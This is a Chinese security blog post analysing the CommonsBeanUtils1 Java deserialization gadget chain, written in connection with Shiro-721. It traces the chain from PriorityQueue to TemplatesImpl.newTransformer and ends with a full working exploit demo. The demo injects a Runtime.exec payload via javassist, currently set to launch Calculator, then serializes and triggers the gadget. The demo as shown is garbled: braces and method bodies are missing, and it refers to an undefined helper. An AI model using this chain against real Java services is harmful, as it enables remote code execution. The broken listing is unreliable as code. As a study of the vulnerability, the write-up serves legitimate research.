最近在复现shiro 721的时候,发现可以利用CommonsBeanUtils1这条利用链。虽然这条利用链中也用到了commonscollections中的类,但整个的思路有很大的不同,故将其进行一波分析。
这条链利用到了commons-beanutils 和commons-collections 。它与CommonsCollections2、4都是以PriorityQueue作为入口点的,调用到comparator.compare函数。不过这里用的不是commons-collections的4.0版本,TransformingComparator并不能被反序列化,不可用。
因此,采用的是BeanComparator
整个的利用链如下所示:
1 2 3 4 5 6 7 8 9 10 11 12 13 PriorityQueue.readObject() ->PriorityQueue.heapify() ->PriorityQueue.siftDown() ->PriorityQueue.siftDownUsingComparator() ->BeanComparator.compare() ->PropertyUtils.getProperty() ->PropertyUtilsBean.getProperty() ->PropertyUtilsBean.getNestedProperty() ->PropertyUtilsBean.getSimpleProperty() ->PropertyUtilsBean.invokeMethod() ->method.invoke() ->TemplatesImpl.getOutputProperties() ->TemplatesImpl.newTransformer()
在commons-beanutils的最新版:1.9.4中也可以利用。
利用链分析 首先定位于BeanComparator.compare()函数。如下图所示:
然后跟进PropertyUtils.getProperty()函数。
继续跟进PropertyUtilsBean.getInstance().getProperty()函数。
然后跟进getNestedProperty()函数,如下图所示:
在此函数总它会根据传入的bean的类型进行不同的调用,由于我们传入的bean实际上是一个TemplatesImpl对象,因此会调用到getSimpleProperty()。跟进它。
同样的,在这里对bean进行一系列的判断以后,首先会根据property的值获取到propertyDescriptor,然后通过getReadMethod获取读取property的方法。最后会进入到invokeMethod函数,跟进这个函数。
在这个函数中,我们看到了一个很熟悉、很关键的函数method.invoke 。它用来执行对象的某个方法。对象就是此函数参数重的bean,values就是参数。在这条利用链中传入的是bean是TemplatesImpl对象,那么调用什么方法能够最终导致命令执行呢?定位到TemplatesImpl对象的getOutProperties()
在这个方法中会看到我们无比熟悉的newTransformer()
到这里整个利用链的分析就结束了。
利用链构造 很显然的,整个过程当中需要使得bean为构造好的TemplatesImpl对象,然后property为outputProperties。定位到BeanComparator.compare函数。bean也就是o1为传入的参数,property为BeanComparator的类成员属性。因此,实例化BeanComparator类如下所示:
1 BeanComparator comparator = new BeanComparator("outputProperties" );
然后追踪参数o1的来源,定位到PriorityQueue.siftDownUsingComparator函数中的comparator.compare函数中的参数c,c来源于queue对象。因此,queue中存入TemplatesImpl对象。
1 2 3 4 5 6 7 8 9 PriorityQueue queue = new PriorityQueue(2 , comparator); queue.add(new BigInteger("1" )); queue.add(new BigInteger("1" )); Object[] queuearray = new Object[]{templates,templates}; Field q1 = queue.getClass().getDeclaredField("queue" ); q1.setAccessible(true ); q1.set(queue,queuearray);
完整的demo 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 import com.sun.org.apache.xalan.internal.xsltc.DOM;import com.sun.org.apache.xalan.internal.xsltc.TransletException;import com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet;import com.sun.org.apache.xalan.internal.xsltc.trax.TransformerFactoryImpl;import com.sun.org.apache.xml.internal.dtm.DTMAxisIterator;import com.sun.org.apache.xml.internal.serializer.SerializationHandler;import javassist.ClassClassPath;import javassist.ClassPool;import javassist.CtClass;import org.apache.commons.beanutils.BeanComparator;import java.io.*;import java.lang.reflect.*;import java.math.BigInteger;import java.util.PriorityQueue;public class test public static class StubTransletPayload extends AbstractTranslet implements Serializable private static final long serialVersionUID = -5971610431559700674L ; public void transform (DOM document, SerializationHandler[] handlers) throws TransletException public void transform (DOM document, DTMAxisIterator iterator, SerializationHandler handler) throws TransletException } public static class Foo implements Serializable private static final long serialVersionUID = 8207363842866235160L ; } public static void main (String[] args) throws Exception String command = "/Applications/Calculator.app/Contents/MacOS/Calculator" ; String cmd = "java.lang.Runtime.getRuntime().exec(\"" + command.replaceAll("\\\\" ,"\\\\\\\\" ).replaceAll("\"" , "\\\"" ) + "\");" ; Object templates = Class.forName("com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl" ).newInstance(); ClassPool pool = ClassPool.getDefault(); pool.insertClassPath(new ClassClassPath(StubTransletPayload.class )) ; pool.insertClassPath(new ClassClassPath(AbstractTranslet.class )) ; CtClass clazz = pool.get(StubTransletPayload.class .getName ()) ; clazz.makeClassInitializer().insertAfter(cmd); CtClass superC = pool.get(AbstractTranslet.class .getName ()) ; clazz.setSuperclass(superC); byte [] classBytes = clazz.toBytecode(); Field field = templates.getClass().getDeclaredField("_bytecodes" ); field.setAccessible(true ); field.set(templates,new byte [][]{classBytes,classFiles.classAsBytes(Foo.class )}) ; Field field2 = templates.getClass().getDeclaredField("_name" ); field2.setAccessible(true ); field2.set(templates,"ananaskr" ); Field field3 = templates.getClass().getDeclaredField("_tfactory" ); field3.setAccessible(true ); field3.set(templates, TransformerFactoryImpl.class .newInstance ()) ; BeanComparator comparator = new BeanComparator("lowestSetBit" ); PriorityQueue queue = new PriorityQueue(2 ,comparator); queue.add(new BigInteger("1" )); queue.add(new BigInteger("1" )); Object[] queuearray = new Object[]{templates,templates}; Field q1 = queue.getClass().getDeclaredField("queue" ); q1.setAccessible(true ); q1.set(queue,queuearray); Field c1 = comparator.getClass().getDeclaredField("property" ); c1.setAccessible(true ); c1.set(comparator,"outputProperties" ); ByteArrayOutputStream baos = new ByteArrayOutputStream(); ObjectOutputStream out = new ObjectOutputStream(baos); out.writeObject(queue); out.flush(); out.close(); byte [] bytes = baos.toByteArray(); ByteArrayInputStream bais = new ByteArrayInputStream(bytes); ObjectInputStream in = new ObjectInputStream(bais); in.readObject(); in.close(); } }
运行结果如下:
参考
